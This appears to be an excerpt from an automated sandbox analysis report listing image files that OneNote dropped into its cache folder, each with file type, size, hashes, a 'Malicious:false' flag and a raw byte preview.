                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................2........................!1AQ.a."2q.B..#R...3C................................ .......................!1.AQBq............?........)&vD.)3Hn*..X+....r...tmL.k..(.E...R. .Z..&...,fJ...!...6..S\t3.=...g&..Bqe.)_U.....1......-..fl.................J...u.i.mU..K..v.w.0O..E.h..D~K.(..9.,8..E.}.............i.\.....t."v..q..C............<..|3.........................*Q..../c.....f.}8....D..|k..Z......0..~..c..e..m(...|.c..'.5.5............==bx.5x.8...T;....=.--.pc...I;.V.m..,(....}...NH.ho....Q..U.E$.~...w.t>.S\....'f.{.+.g._.t....;>.....P...........-..G.h..2...J.% !.E97Ir.D..N....j...oE._...._...".?.......#".S.........Q.Tc.I..*I..k.......=$.........sk1Jp.\K.....F.3.Q..q..J....N..[l.&....OR4bB|..2ul....J...B.$&H..9#j.f.n./........?R~....B.I.@..........m

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000084.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3428
                                                                                                                                            Entropy (8bit):7.766473352510893
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
                                                                                                                                            MD5:EE9E2DF458733B61333E8A82F7A2613D
                                                                                                                                            SHA1:A86704C969F51B86D6A05ED51C6C60214ED9FA89
                                                                                                                                            SHA-256:BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
                                                                                                                                            SHA-512:BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z*...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v...*.q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000086.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):65589
                                                                                                                                            Entropy (8bit):7.960181939300061
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
                                                                                                                                            MD5:8B48DA9F89264D14B83FF9969F869577
                                                                                                                                            SHA1:E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
                                                                                                                                            SHA-256:62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
                                                                                                                                            SHA-512:03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......{.....;Za.....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... |...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S*..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}*.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^.*..$F..{G...8.#....8'..&....8..5.....3(P._....S......|".....u.cr....+a-....&V..x...iI-<|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.A*c^.......*..D..uL=.}.#*0.. M!.A.C......|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000088.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1873
                                                                                                                                            Entropy (8bit):7.534961703340853
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
                                                                                                                                            MD5:4FC8500BD304AD127AF4B5E269DFF59B
                                                                                                                                            SHA1:9A5E3432358A0FCDECE86AEB967319B93A65D14A
                                                                                                                                            SHA-256:B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
                                                                                                                                            SHA-512:E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O..*...5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F].........*.:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008A.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 357x69, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5465
                                                                                                                                            Entropy (8bit):7.79401348966645
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:X0cZneDWlIKmXwxacOHHI6EhzNlSSDDgafbofgt7mGrw:XleDWlIJwQHihRdgu8imGk
                                                                                                                                            MD5:8470F9A96B6C6CAD9EE60961E96D19B2
                                                                                                                                            SHA1:AFE1F01FFA4E4CB06B1D770C9C59DA75B434D1AC
                                                                                                                                            SHA-256:2DF453410796AEC7B9EFEC00059B6CE64BCF67313A95AE458BA600EA5DE14811
                                                                                                                                            SHA-512:CAE5C2ED091BA49761F0348516D53491E578FB165F32F93AC7DAD927383E9A398B06229FAC6A8233777DF708E5001AE0037A1FA960293BDA49892C40B37F2240
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E.e.............................................8...............................!"1...2A#Qa.$34bBDSqt..........................................................?.....`0.....O...3Sd..@..5.0....Q.pw....;....!pN.DR....`0......N^...k.=.u.e.7{.b........?z....zV...M.....P:a.SPj.....WRK.=x.2.h..2..AS..s..A..|.Z/f$D.YX1pr......}G6._.~..)j...+.s.r".{..q..-.^@...#w|.H..*.K)....g...y..`0......2.w@.Ro.d....@...K....}...&... y..f.y.0.|DC..>p.[E.2......v..N.)Z..4.RF.D.8]..Z.|f/..+\ID.r/.o........0i..*.G.O..uj..RN. ....j...xnF...Q.Ls.U.c.D0m....z.k.P;f...b.=..L.hH.,./;.U..`sa.I...?*...I....M.0<.u....!..C..U.T.....s.Q......_..7K..*.....?....R\&=.<.u..oQ}WZ..Yu...{Fe3.h...@.s..mW.G..^....1.W.#[.q2.&u.c.G......`J./..X.C....M;.....3k$}.i.3...#/x.m.Oh.}FH]. ..5NNDIS.-.M~...6..w.d....P.;..k...........v*..T..L.P...s.!B.4..w

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008B.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 14x341, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3361
                                                                                                                                            Entropy (8bit):7.619405839796034
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:zDqnxqMt6gGr/Nln5ANln5ANln5ANln5ANln5ANln5ANln5ANllHN6:CxqMQr/rn5Arn5Arn5Arn5Arn5Arn5AN
                                                                                                                                            MD5:A994063FF2ABEB78917C5382B2F5FA8C
                                                                                                                                            SHA1:BD5C4D816B04A2B6596DFE38DB01228F553FACCC
                                                                                                                                            SHA-256:D72900E8DA72D1A7F3729971AA558E1E9B6E9CF9A0D51E83852E567256DBBFEF
                                                                                                                                            SHA-512:CF2279033DD3EDFE6F6F9E5C517BEBD9A52863EEFD90F57F7A5AE0E0485E705254BE7ED6B50E6CA142669687727AE85E2E6035F69930B75F2E6D3EEFA961EF88
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....C....................................................................C.......................................................................U..........................................>...............................8H........59...$%&7F#'Ddf.....................................>.................................58EG........!#124$%&ACFbcde............?...n.p..v..a.~.._.>......#....8.....w.G...&.W...i...%6m..K;...4."...=..?.~......P..O...j.l..AW.jo..,..=d.h.ta..../.."...z|).J.......Ww._..<Wp.3+8...-5...G:..2.D..I>o..K.F;-.....#...`...6..T...M.....OOgV~..5...np...P..TYr...........b..{r.2.9..].DA.%C....=.v.z......CK."..R..l..y}.i..;.{....JzS.....~.?..Z....=c.h~*..p.@(@..G.....O.]...Hsd.xf".V]..S"..w...4e>....3*U.7..|M.x...|\......FD./.cIe.;.bId..+=...w.......[.k>....}.u...j.xZ.....Q4..+.....B....1O~\......I..h....LaXJ%&.w.<C...n/`.W..U.W.U.}~...}>..^.0.J.....@....LN.b.......5W...m].Eu...:....G..:4.=4ixx..@_0=.mab.T.U.....w..~.V.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008D.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):140755
                                                                                                                                            Entropy (8bit):7.9013245181576695
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
                                                                                                                                            MD5:CC087700C07D674D69AFDFDA0FA9825C
                                                                                                                                            SHA1:F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
                                                                                                                                            SHA-256:A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
                                                                                                                                            SHA-512:843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008F.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):129887
                                                                                                                                            Entropy (8bit):7.8877849553452695
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
                                                                                                                                            MD5:737E96E41D79D3BDACE7AB4F8CBF6274
                                                                                                                                            SHA1:E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
                                                                                                                                            SHA-256:7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
                                                                                                                                            SHA-512:D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....iExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:..*....a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008H.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):84941
                                                                                                                                            Entropy (8bit):7.966881945560921
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
                                                                                                                                            MD5:CB84C108A76C2AFFCAC2551A3C1EAD56
                                                                                                                                            SHA1:8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
                                                                                                                                            SHA-256:139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
                                                                                                                                            SHA-512:6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008J.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 40 x 623, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1569
                                                                                                                                            Entropy (8bit):7.583832946136897
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
                                                                                                                                            MD5:07DB3F43DE7C1392C67802E74707DAA6
                                                                                                                                            SHA1:C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
                                                                                                                                            SHA-256:51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
                                                                                                                                            SHA-512:E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008L.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40035
                                                                                                                                            Entropy (8bit):7.360144465307449
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
                                                                                                                                            MD5:B1DDD365D87605F96D72042CB56572F6
                                                                                                                                            SHA1:ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
                                                                                                                                            SHA-256:06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
                                                                                                                                            SHA-512:9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R*.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$.*.r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<|..1/.|.....b..-..y....]U#Ctn.7m.._.|..2I;|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008N.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):242903
                                                                                                                                            Entropy (8bit):7.944495275553473
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
                                                                                                                                            MD5:C594A4AA7234EF91E6C2714CFE1410F1
                                                                                                                                            SHA1:C0F720D4CE3196852814D0B7347F0CAA0C6FD526
                                                                                                                                            SHA-256:10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
                                                                                                                                            SHA-512:7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008P.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):70028
                                                                                                                                            Entropy (8bit):7.742089280742944
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
                                                                                                                                            MD5:EC7811912ACA47F6AEB912469761D70D
                                                                                                                                            SHA1:C759BC2D908705D599B03BDB366C951B11F99A4E
                                                                                                                                            SHA-256:FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
                                                                                                                                            SHA-512:881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008R.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24268
                                                                                                                                            Entropy (8bit):6.946124661664625
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
                                                                                                                                            MD5:3CD906D179F59DDFA112510C7E996351
                                                                                                                                            SHA1:48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
                                                                                                                                            SHA-256:1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
                                                                                                                                            SHA-512:2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008T.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):47294
                                                                                                                                            Entropy (8bit):7.497888607667405
